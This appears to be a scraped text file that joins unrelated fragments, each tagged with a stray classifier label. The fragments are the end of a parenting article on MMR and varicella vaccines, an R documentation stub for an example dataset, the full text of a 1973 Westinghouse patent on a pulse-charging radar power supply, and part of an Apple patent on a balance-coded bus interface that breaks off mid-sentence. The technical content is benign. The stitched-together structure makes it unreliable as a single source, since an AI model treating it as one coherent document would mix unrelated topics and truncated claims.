live attenuated viruses of the three diseases are mixed and injected. This vaccine will also protect against measles, mumps, and rubella. Side effects can include sore arm from the injection, fever, rash, and joint pain. What is varicella? Varicella helps to protect a child from chicken pox, which is caused by the varicella-zoster virus. It is made from live but weakened parts of the virus. The first dose is given at around 15 months of age. The only side effects reported are pain at the injection site and a mild rash. Knowing what shots your child needs, the possible side effects, and the necessity of each of these vaccinations is important. Arm yourself with knowledge so that you can take appropriate action if something unforeseen should happen. Photo: Getty
__label__pos
0.997939
R/data.R #' Example Bivariate Classification Data #' #' @details These data are a simplified version of the segmentation data contained #' in `caret`. There are three columns: `A` and `B` are predictors and the column #' `Class` is a factor with levels "One" and "Two". There are three data sets: #' one for training (n = 1009), validation (n = 300), and testing (n = 710). #' #' @name bivariate #' @aliases bivariate_train bivariate_test bivariate_val #' @docType data #' @return \item{bivariate_train, bivariate_test, bivariate_val}{tibbles} #' #' @keywords datasets #' @examples #' data(bivariate) NULL tidymodels/workflows documentation built on Dec. 5, 2019, 8:42 a.m.
__label__pos
0.971455
Title: RADAR POWER SUPPLY United States Patent 3740640 Abstract: A radar power supply charges a pulse network in a sequence of high frequency charging pulses. Transformation, providing isolation and voltage boost between the primary power source and the pulse network, performed at high frequency, minimizes transformer size and weight. Means are provided for selectively adjusting the number of charging pulses and damping the last of the charging pulses, thereby eliminating requirements for filtering and precise regulation of primary power source while affording precise regulation of the voltage of the output energy pulse. Inventors: Ravas, Richard J. (Monroeville, PA) Pittman, Paul F. (Pittsburgh, PA) Saletta, Gary F. (Pittsburgh, PA) Application Number: 05/079179 Publication Date: 06/19/1973 Filing Date: 10/08/1970 Assignee: Westinghouse Electric Corporation (Pittsburgh, PA) Primary Class: Other Classes: 307/108, 327/482, 342/175 International Classes: G01S7/282; H02M3/04; H03K3/57; (IPC1-7): G05F1/56; H03K17/60 Field of Search: 321/2,45C,15,21 323 View Patent Images: Foreign References: CA676761A Primary Examiner: Goldberg, Gerald Claims: We claim as our invention 1. A power supply comprising: 2. A power supply as recited in claim 1 wherein said de-Q network includes: 3. In a power supply including a transformer having primary and secondary windings, wherein the secondary winding is connected in a secondary circuit including a series connected uni-directional conducting means to a storage means, the method of operating comprising: 4. In a power supply including a transformer having primary and secondary windings, wherein the secondary winding is connected in a secondary circuit including a series-connected uni-directional conducting means to a storage means, the method of operation comprising: 5. Power supply circuitry for repeatedly varying the energy level of a storage means to thereby provide an output signal thereacross of a desired magnitude, said circuitry comprising: 6. Power supply circuitry as claimed in claim 5, wherein said control means is responsive to the termination of the current flow in said secondary winding for initiating the application of a pulse-like signal to said primary winding. 7. Power supply circuitry as claimed in claim 5, wherein said control means is responsive to the application of a predetermined number of pulse-like signals to said primary winding for terminating the further application of the pulse-like signals to said primary winding. 8. A power supply comprising: 9. A power supply as recited in claim 8 wherein there is further provided: 10. A power supply as recited in claim 8 wherein there is further provided: 11. A power supply as recited in claim 8 wherein said switching means comprises a switching transistor having its collector-emitter conducting path connected in series with said primary winding in said primary circuit. 12. A power supply as recited in claim 8 wherein said switching means comprises a resonant commutated thyristor network. 13. A power supply as recited in claim 12 wherein: 14. A power supply as claimed in claim 8, wherein said transformer includes a gapped core. Description: BACKGROUND OF THE INVENTION 1. Field of the Invention This invention relates to a radar power supply and, more particularly, to such a power supply employing a high frequency pulse charging network enabling substantial size and weight reductions in the power supply rendering it ideally suited for use in airborne and space vehicles. 2. Description of the Prior Art Radar power supply systems of various types are well known in the art. The primary power sources for such systems typically include three-phase, 240 volt AC electrical power of 50, 60, or 400 Hz. The power requirement of a radar output device, however, is a high voltage, well-regulated pulse which is supplied to a suitable microwave generator. In prior art systems, transformation of the relatively low level, AC voltage of the primary power supply to the high level DC voltage required for the output pulse of the radar power supply is achieved by fundamental frequency transformation and rectification with fundamental frequency filtering. The conventional prior art system employs a DC resonant charging circuit for charging an energy storage element to a high level DC voltage. The resulting pulse network voltage must be independent of input voltage variations or ripple from the primary power supply and also must be independent of the nature of the load pulse intervals, i.e., whether regular and periodic, or random. Typically, the system power supply is connected through a unidirectional conducting element, such as a diode, and a charging inductor to the pulse network. The pulse network in turn is connected to the primary of a coupling transformer, the secondary of which is connected to the load, for example, a microwave generator. A switch such as a thyratron is connected across the pulse network and the output coupling circuit. With the switch in its off or non-conducting state, the system power supply charges the pulse network through the diode and charging inductor, the charging inductor cooperating with the pulse network to increase the charge across the latter in a conventional DC resonant charging operation. The thyratron switch is turned on upon completion of the charging, as described, for generating each output pulse. When the switch is in the on condition, an effective short circuit is established, connecting the pulse network to the coupling transformer and thereby transferring the energy stored in the pulse network to the load. Prior art systems of the type described require ripple filtration circuits for removing the ripple frequency from the rectified AC power source voltage, and voltage regulation circuits for controlling the amplitude of the voltage developed at the pulse network, ultimately to be coupled to the load. The power supply filtering typically is achieved by large LC (inductive-capacitive) low-pass filters, and regulation is typically achieved by adjusting the Q of the resonant charging circuit. In view of the relatively high power requirements of the utilization devices, e.g., microwave generators, conventional radar power supplies are of undesirably large size and weight, factors of substantial concern in use of such systems in airborne and space vehicles. Consideration therefore has been given to techniques for reducing the size and weight factors. In conventional circuits, the only element that can be controlled to reduce size and weight is the charging inductor. However, certain limitations are imposed on the characteristics of the charging inductor required by such circuits. For example, if the size of the charging inductor is reduced for realizing a reduction in weight, the primary power source must produce a much higher peak current, albeit over a shorter period of time. Although the weight and size of the inductor may be reduced, a primary power supply having higher voltage and peak current capability is required with commensurate problems of increased weight and size. Conversely, by making the inductor larger, the peak current required to be drawn may be reduced but only with a commensurate increase in the charging time. The charging time, however, must be limited in accordance with the required pulse repetition frequency of the system. These and other problems are overcome by the radar power supply of the invention through the technique of charging the network in a sequence of pulses. Whereas prior art systems require complex circuits to provide the necessary regulation and filtering, these functions are readily achieved in the system of the invention by controlling the number of charging pulses and, if better regulation is needed, adjusting the Q of the circuit during the last of such pulses to provide a well-regulated, ripple-free high power output pulse. SUMMARY OF THE INVENTION In accordance with the invention, high frequency charging techniques are employed, permitting a significant reduction in the weight and size of the radar power supply both through reduction of the transformer requirements in view of high frequency operation and by complete elimination of the massive charging inductor required in prior art circuit designs. The primary power supply provides a DC voltage derived by rectification of a multi-phase AC voltage of conventional voltage level and frequency. The AC voltage is passed through a full wave bridge rectifier, the output of which is supplied to a high frequency bypass filter, the latter, however, not being provided for ripple smoothing but merely to eliminate high frequency transients which may occur sporadically in the AC supply. The thus filtered DC voltage is supplied to the primary of a special coupling transformer connected in series with a switching transistor. The secondary of the transformer is connected through a diode to the pulse network. The coupling transformer employs a gapped core structure, enabling it to function as an inductive energy storage element. By appropriate selection of the relative polarity senses of the primary and secondary transformer windings, when the switching transistor is rendered conductive, the diode in the secondary circuit is reverse biased. The secondary winding therefore appears unloaded, looking at it from the primary winding. All energy which flows from the charging or primary power supply is stored in the air gap of the transformer. The transistor is then switched off, inducing a voltage in the secondary of opposite polarity, and thus poled for conduction of the diode. As a result, the stored inductive energy previously developed in the air gap of the special transformer is released, and current flows in the secondary circuit thus charging the pulse network. The pulse network is charged in this manner by a succession of pulses, each successive pulse necessarily being required to exceed the voltage level developed across the pulse network in prior pulsing steps. The number of pulsing steps may be preselected, or a suitable voltage sensor may be employed to define the number of pulses required, for developing the desired output voltage pulse. In operation, the primary of the transformer is not a portion of a DC resonant charging circuit and, since primary and secondary currents never flow simultaneously, the voltage developed across the secondary of the coupling transformer can theoretically be infinite in value. In reality, the voltage developed across the secondary when the switching transistor is turned off is effectively determined by the voltage theretofore developed across the pulse network. In view of the effective isolation between the primary and the secondary windings, the transformer operates as an energy transfer device, first storing energy by virtue of primary current flow, when the transistor is conducting, and then discharging the stored energy of the primary winding circuit through the secondary winding circuit to the pulse network when the transistor blocks. The basic technique of the high frequency sequential pulse charging effected in accordance with the above-described circuit may also be employed in a resonant commutated thyristor network in accordance with a second disclosed embodiment of the invention. In accordance with either of the disclosed embodiments of the invention, the pulse network is charged with a large number of pulses at a relatively high pulse frequency permitting a substantial reduction in the inductive characteristics of the coupling transformer with commensurate weight and size reductions. Further, owing to the type of transformer connection used, the need for the conventional massive charging inductor is eliminated, resulting in further weight and size reductions. Regulation and filtering of the output pulse is readily accomplished by controlling the number of the successive step pulses. A de-"Q" network, including a damper winding coupled to the primary winding of the coupling transformer, can be actuated if needed for closer regulation when the output voltage across the pulse network reaches the desired voltage level. The damper winding dissipates a portion of the energy stored in the transformer, and prevents it from flowing to the output pulse network. Power supplies in accordance with the invention afford great versatility in use in that the capacitance of the pulse network or other load circuit may be increased to any required value without impairing the charging capability of the supply. In addition, plural such supplies can be employed in a parallel circuit configuration for energizing a charging network of lumped elements for increasing the total system power capacity and to provide redundancy. These and other advantages and improvements of the radar power supplies of the invention will be more readily apparent from the following detailed description of the invention. BRIEF DESCRIPTION OF THE DRAWINGS FIG. 1 is a schematic, partially in block diagram form, of a first embodiment of the radar power supply of the invention; FIGS. 1a and 1b are schematic diagrams representing the equivalent circuits of the system of FIG. 1 during two different, respectively associated, phases of the charging operation; FIG. 2 is a schematic diagram of a utilization circuit, such as a microwave generator, to be driven by the radar power supply of the invention; FIG. 3 is a schematic diagram, partially in block diagram form, of a second embodiment of the radar power supply of the invention employing a resonant commutated thyristor network; FIGS. 4a through 4f comprise, variously, current and voltage waveforms representing the operation of the circuit of FIG. 1; FIGS. 5a through 5f comprise, variously, current and voltage waveforms representing the operation of the circuit of FIG. 3; and FIG. 6 is a schematic of a lumped pulse network employing plural power supplies in accordance with the invention. DETAILED DESCRIPTION OF THE INVENTION In FIG. 1 is shown a schematic, partially in block diagram form, of a radar power supply in accordance with the invention. Any suitable primary power supply may be employed providing a DC voltage VB, for example 300 VDC. As shown, the voltage VB is obtained from a conventional power source of three-phase alternating current of 240 volts and of from 50 or 60 to 400 Hz. The three-phase power is provided through a full wave rectifier 10, the output of which is supplied to a high frequency bypass filter 12. As will hereinafter appear, the radar power supply of the invention does not require precise regulation of the input DC voltage and particularly can tolerate a certain amount of voltage variations or ripple in the DC voltage. Thus, the high frequency bypass filter 12 is provided only to filter out any high frequency transient voltages which may appear in the supply. A special coupling transformer T has a gapped core structure, and includes a primary winding P connected in series with a power switching transistor 14 to the primary power source. The secondary S of the transformer T, poled as indicated, is connected in series with a diode D across the terminals of a pulse or storage network PN. Terminals 16 and 18 represent connections to a utilization device, not shown in FIG. 1 but typically comprising a microwave generator. Connected to the base of the switching transistor 14 is a pulsing control circuit 20. For a reason to be explained, the pulsing control circuit 20 includes a first input associated with a sense winding 22 and a second input derived from a comparator 24, the latter also being connected to the sense winding 22. As also later explained, the system may further include a de-Q network 26 comprising a dissipative element 27, a winding 28 coupled to the primary winding P of transformer T, and a switch 29. The switch 29 is actuated at a specified time by the pulse control circuit 20. FIG. 2 comprises a schematic illustrating a suitable utilization device for FIG. 1. Connected to the terminals 16' and 18', respectively corresponding to the terminals 16 and 18 in FIG. 1, is a switch 30 and a primary 32 of a coupling transformer 34, the secondary winding 36 of which has connected across its terminals the ultimate utilization device 38 illustrated as a load RL and comprising, for example, a microwave generator. In operation of the circuit of FIG. 1, the pulsing control 20 serves to switch the power switching transistor 14 on and off a number of times for charging of the pulse network PN to the desired voltage level. The circuit response for each cycle of switching on and off of the transistor 14 will first be considered. When transistor 14 is initially switched to a conducting state, current flows from the primary power source through the series-connected primary winding P and the transistor 14, the primary winding P absorbing energy from the power supply. In view of the polarity sense of the windings P and S of transformer T, however, the voltage developed in the primary winding P and coupled to the secondary winding S does not cause a flow of current in the latter since the diode D is reverse biased. Thus, the secondary winding S appears to be unloaded, when looked at from the primary winding P, and the energy is stored by transformer T. FIG. 1a is a schematic of the effective charging circuit of the primary winding P. As previously noted, the secondary is isolated during the conducting interval of transistor 14' and thus the equation relating voltage drops in the primary winding circuit is: VB = VP + VCE = LP dIP /d t + VCE Where VB is the primary source voltage, VP is the voltage developed across the primary winding, VCE is the voltage across the collector to emitter terminals of the switching transistor, LP = effective inductance of transformer primary, and IP is the current in the primary winding. The energy which flows from the charging source VB is stored in the air gap of the transformer and has a magnitude: W = 1/2 LP I2P' (2) where IP' is the peak transformer primary current. When transistor 14 is turned off, the primary circuit becomes open-circuited and the current flow terminates. The voltage of the primary winding P reverses in polarity by Lenz's Law in an attempt to maintain the previous current flow. The voltage induced in the secondary winding S likewise reverses in polarity and accordingly forward biases the diode D, whereby current flows in the secondary circuit to charge the pulse network PN. Thus, the energy stored in the transformer T is transferred to the secondary winding S and thus to the high voltage pulse network PN. In FIG. 1b is shown the effective secondary charging circuit during the off interval of the transistor 14, and during which interval current has ceased to flow in the primary winding P. As is apparent in FIG. 1b, the value of VP is determined by VPN as reflected back by the secondary winding S to the primary winding P. During the interval when transistor 14 is off, VP is independent of VB. Each time transistor 14 is turned off, a voltage VS is induced in the secondary winding exceeding the voltage developed across the pulse network PN by energy stored therein to effect continued charging of the latter by succeeding charging pulses. The magnitude of this voltage is not related to VB or to the transformer turns ratio, but is simply that value which, by overcoming the pulse network charge voltage, causes diode D to become conductive and allow secondary current to flow. With reference to the waveforms of FIGS. 4a through 4f, the successive switching on and off of transistor 14 is represented in FIG. 4a, illustrating the collector to emitter voltage of transistor 14. Where VB represents the primary source voltage, in the off state of the transistor the voltage VCE is equal to the sum of VB and a VP component which is VPN reflected back by the turns ratio and in the on state is essentially zero volts. As previously noted, the transistor 14 is switched on and off a number of times sufficient to develop the desired voltage across the pulse network PN in FIG. 1, the switching being represented in FIG. 4a by a series of conducting intervals 1,2,... The current flow IP in the primary winding P resulting from the conducting intervals of transistor 14 is represented in FIG. 4b. The inductance of the primary winding P is relatively high and, as a result, a generally linear increase in current during the conducting interval results, in accordance with: (dIP)/dt = VB /L P (3) where IP is the current in the primary winding; LP is the effective inductance of the primary winding P; VB is the primary DC source voltage as above identified; and the voltage drop across the transistor (VCE) during conduction is assumed to be negligible compared with VB. The voltage VP of the primary winding P in the successive cycles is illustrated in FIG. 4c. Note that during the off interval, the primary voltage goes to zero when secondary current ceases. Since the secondary winding S is floating when the primary winding P is energized or excited, and similarly the primary is floating when the secondary is excited, there is no fixed ratio between the input voltage of the primary winding P when the transistor is conducting and output voltage of the secondary winding S when the transistor is off. By providing a secondary-to-primary voltage transformer ratio of 100:1, for VB = 300 VDC, the output voltage will be in the range of 30 K VDC, depending upon the number of charging steps employed. If no de-Qing is used, the final pulse network energy can be regulated to ±1 pulse. For example, if the system is designed so that nominally twenty pulses are necessary to charge the pulse network to full voltage, the network energy will be within ±5 percent. The waveform of the voltage VS induced in the secondary winding S and the resultant current pulses IS which flow in the secondary circuit for charging the pulse network PN are shown in FIGS. 4d and 4e, respectively. The secondary current IS increases rapidly upon termination of the current flow in the primary winding IP of FIG. 4b and decreases as energy is transferred from the secondary winding S to the pulse network PN. Accordingly, the transformer T effects, during each pulsing cycle, an energy transfer wherein the energy stored in the air gap 1/2LI2 is transferred, less losses, to the secondary, and ultimately to the pulse network PN as the energy 1/2CV2 for energization of the load. The resultant, successive step charging of the pulse network PN is illustrated in the waveform of FIG. 4f. As is apparent from the foregoing discussion of operation, the mutually exclusive floating conditions require that the current flow in the primary winding P must not be initiated until current flow in the secondary winding S has decreased to zero. Accordingly, the pulsing control circuit 20 responds to the output of sense winding 22 to assure that transistor 14 is switched on only after that condition has obtained. As previously noted, the system may be designed to allow a predetermined number, n, of pulsing intervals for developing the requisite energy storage in the pulse network PN. Pulsing control circuit 20 may correspondingly include a counter preset to the desired number of pulsing intervals n to achieve the desired energy levels. When the preset count is attained, the control circuit 20 may also actuate the utilization circuit for receiving the output pulse from the pulse network PN, and then reset the counter to initiate a subsequent pulse charging cycle. Unfortunately, this technique produces an output voltage which is sensitive to regulation and ripple in VB as well as load variations. Alternatively, or in cooperation therewith, a comparator circuit 24 may be provided for responding to the output of sense winding 22 to produce a control input to pulsing control circuit 20 for terminating the succession of pulsing intervals when the desired output voltage level is attained. It is apparent that the IR drop in the secondary winding S will affect the output voltage sensed by the sense winding 22, and suitable correction for this should be provided; alternatively, the comparator may receive its sensed output voltage level directly from the pulse network PN to avoid this inaccuracy. As hereinabove noted, a significant feature of the power supply of the invention is that the feedback system is not deleteriously affected by variations, or ripple, in the voltage from the primary power source and does not require filtering of the voltage applied to the pulse network PN charging circuit. Precise regulation of the final voltage obtained across the pulse network PN and elimination of the ripple, or voltage variations, which may be present is effected by selectively controlling the energy of the charging pulse during the last pulse interval. More particularly, the de-Q network 26 is switched into the circuit during the last pulse interval by the pulsing control circuit 20 which, illustratively, acts to close the switch 29 and complete the circuit between the dissipative element 27 and the winding 28. The damper winding 28 and the element 27 thus are coupled into the primary circuit when the output voltage reaches the desired level, dissipating the remaining energy stored in the transformer T rather than permitting it to flow as a current from the secondary winding S to the pulse network PN. This same function can be performed in a non-dissipative manner if desired; however, since each charging pulse presents only a small fraction of the desired output energy, for example, 5 percent in a 20 pulse design, even a completely dissipative network will cause only a commensurate, and thus relatively insignificant, system energy loss. Numerous advantages of the radar power supply of the invention are apparent from the foregoing, and some are here reconsidered. The size of the transformer T and, generally, the magnetics associated with the circuit are operated at high frequency, whereby the size and rating of the transformer may be reduced, providing both size and weight savings. The pulsing technique affords accurate and simplified control of the voltage level developed across the PN network and, by the de-Qing function performed during the last pulsing interval, provides precise regulation and ripple smoothing of the final output DC voltage level. Finally, the application of the de-Qing network during the last cycle provides a significant improvement in efficiency over the prior art which employs de-Qing during a major portion of the charge cycle. In FIG. 3 is shown a schematic, partially in block diagram form, of a second embodiment of a radar power supply in accordance with the invention. The system of FIG. 3 employs a resonant commutated thyristor network in the primary circuit for providing successive pulsing in developing the requisite charging of the pulse network. The system of FIG. 3 is in many respects identical to that of FIG. 1, and includes a full wave rectifier 10 and a low pass filter 12 for supplying the primary power supply voltage VB. The transformer T again includes primary windings P and S as in FIG. 1, the secondary circuit S including a diode D and a pulse network PN in which the output pulse is developed for ultimate supply to a utilization circuit connected to terminals 16 and 18. In FIG. 3, however, the primary circuit P includes a diode 40 connected in series with a resonant commutating circuit 42 including an inductor 43 and a capacitor 44. A gate controlled switching device such as a thyristor 46 is connected in shunt with the commutating circuit 42. A pulsing control circuit 48 supplies a trigger pulse to the gate of thyristor 46 and, as in FIG. 1, also actuates a switch of a de-Q network 50 associated with the primary winding P, the latter serving the identical function as the de-Q network 26 of FIG. 1. The operation of the circuit may be explained with the aid of the waveforms of FIGS. 5a through 5f, which show voltage and current waveforms occurring as the network is charging. When the SCR 46 is gated on by the pulsing control circuit 48, an effective short circuit shunt path is produced across the commutating circuit 42 as represented by the current pulse of ITh in FIG. 5a. The resultant fly wheel action of the inductor 43 causes the voltage across the capacitor 44 to reverse in polarity as illustrated in the waveform of FIG. 5b, commutating thyristor 46 to an off condition. Current now flows through the primary winding P of the transformer T, as shown in FIG. 5c, to re-establish the voltage across the capacitor C in the positive direction. The charging path includes the inductors comprising the primary winding P and inductor 43 of the commutating circuit 42. During this time, no secondary current flows as shown in FIG. 5d. As shown in FIG. 5e, the transformer primary voltage, and the secondary voltage as well, decrease toward zero and then reverse polarity as primary current continues to flow into the capacitor 44. When the secondary voltage reaches the value of the voltage already in the pulse network PN, diode D conducts causing current flow to be directed from the primary to the secondary as shown in FIGS. 5c and 5d. The flow of secondary current further charges the pulse network PN, raising its voltage level as shown in FIG. 5f. As diode D conducts secondary current, and during the interval after secondary current stops but before the thyristor is triggered, diode 40 prevents capacitor 44 from discharging back through transformer T. As was the case with the transistor circuit shown in FIG. 1, transformer T acts as a pump to first store energy from a source and then discharge it into a sink, or storage system, and particularly the PN network. The system of FIG. 3 may be preferable for certain applications to that of FIG. 1. The transistor switch 14 of FIG. 1 must be capable of handling high power at high speed switching rates; the stringent requirements imposed on such an element are eliminated in the circuit of FIG. 3. In FIG. 3, termination of current flow in the primary circuit is effected by the diode D, the function of thyristor 46 being to trigger into operation the resonant commutating function of the circuit 42. Primary current IP flows when thyristor 46 is in its off state, and the resonant, or flywheel action of the commutating circuit 42 itself provides for reverse biasing of the thyristor 46 to switch it back to its off state. The circuit of FIG. 3 further includes sensing and control circuits for the pulsing and de-Qing functions as described in relation to FIG. 1, and therefore are not here shown or described. In FIG. 6 is shown a schematic of a pulse network having coupled thereto a plurality of power supplies in accordance with the invention. The pulse network includes lumped capacitive elements 50 and inductors 52. Charging of each of capacitive elements 50 is effected by current pulses induced in a secondary winding S' connected through corresponding diodes 54 to the respectively associated capacitors 50. The windings S' correspond to the secondary winding S of the system of either FIG. 1 or FIG. 3. Similarly, the primary windings P' in the circuit of FIG. 6 represent the primary circuit including the primary winding P of either of the system of FIG. 1 or FIG. 3. Preferably, the characteristics of each corresponding power supply and charging network are matched to assure uniformity of the output pulses. It is apparent that various modifications may be made in the system described herein without departure from the scope of the invention. Accordingly, the invention is not to be considered limited by the description, but only by the scope of the appended claims.
__label__pos
0.979958
    Resources Contact Us Home Browse by: INVENTOR PATENT HOLDER PATENT NUMBER DATE     Single-ended balance-coded interface with embedded-timing 6734811 Single-ended balance-coded interface with embedded-timing Patent Drawings:Drawing: 6734811-2    Drawing: 6734811-3    Drawing: 6734811-4    Drawing: 6734811-5    Drawing: 6734811-6    Drawing: 6734811-7    Drawing: 6734811-8    Drawing: 6734811-9     « 1 » (8 images) Inventor: Cornelius Date Issued: May 11, 2004 Application: 10/443,547 Filed: May 21, 2003 Inventors: Cornelius; William (Los Gatos, CA) Assignee: Apple Computer, Inc. (Cupertino, CA) Primary Examiner: Young; Brian Assistant Examiner: Nguyen; John Attorney Or Agent: Blakely, Sokoloff, Taylor & Zafman LLP U.S. Class: 341/102; 341/58; 341/59; 341/60 Field Of Search: 341/102; 341/58; 341/59; 341/60; 341/51; 341/52; 341/81 International Class: U.S Patent Documents: 5625644; 6151334; 6295010; 6477502 Foreign Patent Documents: Other References: Abstract: An interface includes an encoder to receive a stream of input symbols and, in response, to output a corresponding stream of output symbols of substantially equal weight via multiple signal lines, which can improve noise/speed performance. The encoder outputs the stream of output symbols so that no output symbol is consecutively repeated. A repeat symbol is used to indicate that the current symbol is identical to the immediately preceding symbol. This encoding allows an interface receiving the stream of output symbols can extract a clock signal from the stream. Claim: What is claimed is: 1. An interface unit, comprising: a first encoder to receive a stream of input symbols selected from a plurality of input symbols and, in response, to selectively output acorresponding stream of output symbols selected from a plurality of output symbols, each of the plurality of input symbols being associated with a corresponding output symbol of the plurality of output symbols, wherein no two consecutively outputtedsymbols of the stream of output symbols are identical. 2. The interface unit of claim 1 wherein all of the plurality of output symbols have a balanced weight. 3. The interface unit of claim 1 wherein, in response to consecutively receiving two identical input symbols, the first encoder to consecutively output two output symbols of the plurality of output symbols of which one is an output symbolindicating that the one of the two consecutively received input symbols is identical to the other. 4. The interface unit of claim 1 wherein the plurality of output symbols includes an output symbol that when outputted by the first encoder indicates that an input symbol received by the first encoder during one cycle is identical to anotherinput symbol that was received during an immediately preceding cycle. 5. The interface unit of claim 1 wherein transitions between consecutive output symbols of the stream of output symbols correspond to transitions of a timing signal used to sample the outputted stream of output symbols. 6. The interface unit of claim 1 wherein the plurality of output symbols includes a symbol that when outputted by the first encoder functions as a mask signal. 7. The interface unit of claim 1 further comprising a plurality of output circuits coupled to the first encoder, wherein the plurality of output circuits each output a single-ended signal. 8. The interface unit of claim 1 wherein the first encoder is part of a memory controller. 9. The interface unit of claim 8 wherein the plurality of input symbols corresponds to a portion of a memory data word. 10. The interface unit of claim 9 further comprising a second encoder substantially similar to the first encoder, wherein an output symbol from the first encoder and an output symbol of the second encoder together represent a byte of a memorydata word. 11. A method for transmitting data, the method comprising: receiving a stream of input symbols selected from a plurality of input symbols; selectively providing an output symbol corresponding to each received input symbol, each output symbolselected from a plurality of output symbols, each input symbol of the plurality of input symbols being represented by an output symbol of the plurality of output symbols; outputting a stream of the provided output symbols so that no two consecutivelyoutputted symbols are the same. 12. The method of claim 11, wherein the plurality of output symbols are balanced equal weight output symbols. 13. The method of claim 11, wherein outputting a stream of provided output symbols further comprises, selectively outputting two consecutive output symbols in response to a consecutive receiving of two identical input symbols, wherein one of thetwo consecutive output symbols is a symbol indicating that the one of the two consecutively received input symbols is identical to the other. 14. The method of claim 11 wherein the plurality of output symbols includes an output symbol that when outputted indicates that an input symbol received during one cycle is identical to another input symbol that was received during animmediately preceding cycle. 15. The method of claim 11 wherein transitions between consecutive output symbols of the stream of output symbols correspond to transitions of a timing signal used to sample the outputted stream of output symbols. 16. The method of claim 11 wherein the plurality of output symbols includes a symbol that when outputted functions as a mask signal. 17. The method of claim 11 wherein the stream of provided outputted symbols are outputted as single-end signals. 18. The method of claim 11 wherein the stream of provided outputted signals are outputted as part of a memory interface. 19. The method of claim 18 wherein a symbol of the stream of input symbols corresponds to a portion of a memory data word. 20. The method of claim 19 further comprising outputting a second stream of output symbols selected from the plurality of output symbols, wherein an output symbol from the first stream of output symbols and an output symbol of the second streamof output symbols together represent a byte of a memory data word. 21. An apparatus for transmitting data, the apparatus comprising: means for receiving a stream of input symbols selected from a plurality of input symbols; means for selectively providing an output symbol corresponding to each received inputsymbol, each output symbol selected from a plurality of output symbols, each input symbol of the plurality of input symbols being represented by an output symbol of the plurality of output symbols; means for outputting a stream of the provided outputsymbols so that no two consecutively outputted symbols are the same. 22. The apparatus of claim 21, wherein the plurality of output symbols are balanced equal weight output symbols. 23. The apparatus of claim 21, wherein the means for outputting a stream of provided output symbols selectively outputs two consecutive output symbols in response to a consecutive receiving of two identical input symbols, wherein one of the twoconsecutive output symbols is a symbol indicating that the one of the two consecutively received input symbols is identical to the other. 24. The apparatus of claim 21 wherein the plurality of output symbols includes an output symbol that when outputted indicates that an input symbol received during one cycle is identical to another input symbol that was received during animmediately preceding cycle. 25. The apparatus of claim 21 wherein transitions between consecutive output symbols of the stream of output symbols correspond to transitions of a timing signal used to sample the outputted stream of output symbols. 26. The apparatus of claim 21 wherein the plurality of output symbols includes a symbol that when outputted functions as a mask signal. 27. The apparatus of claim 21 wherein the means for outputting outputs the stream of provided outputted symbols as single-end signals. 28. The apparatus of claim 21 wherein the stream of provided outputted signals are outputted as part of a memory interface. 29. The apparatus of claim 28 wherein a symbol of the stream of input symbols corresponds to a portion of a memory data word. 30. The apparatus of claim 29 further comprising outputting a second stream of output symbols selected from the plurality of output symbols, wherein an output symbol from the first stream of output symbols and an output symbol of the secondstream of output symbols together represent a byte of a memory data word. 31. A system, comprising: a processor; a memory; an interleaving unit coupled to the memory; and a memory controller coupled to the processor and the interleaving unit, the memory controller including a first encoder to receive a stream ofN-bit symbols selected from a plurality of N-bit symbols and, in response, to selectively output to the interleaving unit a corresponding stream of M-bit symbols selected from a plurality of M-bit symbols, M being greater than N, each N-bit symbol of theplurality of N-bit symbols being associated with a corresponding M-bit symbol of the plurality of M-bit symbols, wherein no two consecutively outputted symbols of the stream of M-bit symbols are identical. 32. The system of claim 31 wherein the interleaving unit includes a decoder to decode a received M-bit symbol into the corresponding N-bit symbol. 33. The system of claim 31 wherein, in response to consecutively receiving two identical N-bit symbols, the first encoder to consecutively output two M-bit symbols selected from the plurality of M-bit symbols of which one is an output symbolindicating that the one: of the two consecutively received N-bit symbols is identical to the other. 34. The system of claim 31 wherein the plurality of M-bit symbols includes an M-bit symbol that when outputted by the first encoder indicates that a N-bit symbol received by the first encoder during one cycle is identical to another N-bit symbolthat was received during an immediately preceding cycle. 35. The system of claim 31 wherein transitions between consecutive M-bit symbols of the stream of M-bit symbols correspond to transitions of a timing signal used to sample the outputted stream of M-bit symbols. 36. The system of claim 31 wherein the plurality of M-bit symbols includes a M-bit symbol that when outputted by the first encoder functions as a mask signal. 37. The system of claim 31 wherein the interleaving unit includes a second encoder that is substantially similar the first encoder of the memory controller, the second encoder to receive N-bit symbols selected from the plurality of N-bit symbolsfrom the memory and to output corresponding M-bit symbols of the plurality of M-bit symbols to the memory controller, and wherein the memory controller includes a decoder to decode received M-bit symbols into corresponding N-bit signals. 38. The system of claim 37 wherein the interleaving unit includes a plurality of interleaving devices. 39. The system of claim 31 wherein the plurality of N-bit symbols corresponds to a portion of a memory data word. 40. The system of claim 39 wherein the memory controller further comprises a third encoder substantially similar to the first encoder, wherein a M-bit symbol from the first encoder and a M-bit symbol of the third encoder together represent abyte of a memory data word. 41. The system of claim 31 wherein the plurality of M-bit symbols are balanced equal weight symbols. Description: FIELD OF THE INVENTION Embodiments of invention relate generally to bus interfaces and, more specifically but not exclusively relate to encoded bus interfaces. BACKGROUND INFORMATION Modern bus systems for use in high-performance systems (e.g., a processor system) can operate at 400 MHz or more. Such high-speed systems can be susceptible to noise (e.g., supply noise due to switching of the circuits used to drive signals onthe bus lines). One solution is to use differential signaling schemes that help reduce sensitivity to common mode noise on the signal lines. However, differential signaling schemes have the disadvantage of doubling the number of signal lines and transceiverscompared to single-ended schemes. Thus, for some applications, differential signaling may be undesirable. For example, some modern buses are 64-bits wide for data, thereby requiring 128 data signal lines. This relatively large number of data signallines (and the associated transceivers) occupies valuable area on the chip(s) and wiring substrate (e.g., motherboard), which tends to increase the cost and complexity of the system. On the other hand, if single-ended signal lines are used, in addition to the aforementioned noise sensitivity, the bus interfaces driving the signals on the signal lines can be "unbalanced". That is, the number of logic low signals and logichigh signals during a clock cycle may be different, resulting in a local net current flow in or out of a bus interface. This current flow can undesirably cause localized power supply noise (including simultaneously switching output (SSO) noise). SUMMARY OF THE INVENTION In accordance with aspects of embodiments of the present invention, an interface includes an encoder to receive a stream of input symbols and, in response, to output a corresponding stream of output symbols of substantially equal weight viamultiple signal lines. In this context, a symbol refers to value of a preselected set of bits propagated on a selected set of signal lines. This balance-coded interface allows for relatively fast bus frequency with relatively low simultaneous switchingoutput (SSO) noise. In accordance with another aspect of embodiments of the present invention, an interface receiving the stream of output symbols can extract a clock signal from the stream. In this aspect, the encoder outputs the stream of output symbols so thatno output symbol is consecutively repeated. In one embodiment, a repeat symbol is used to indicate that the current symbol is identical to the immediately 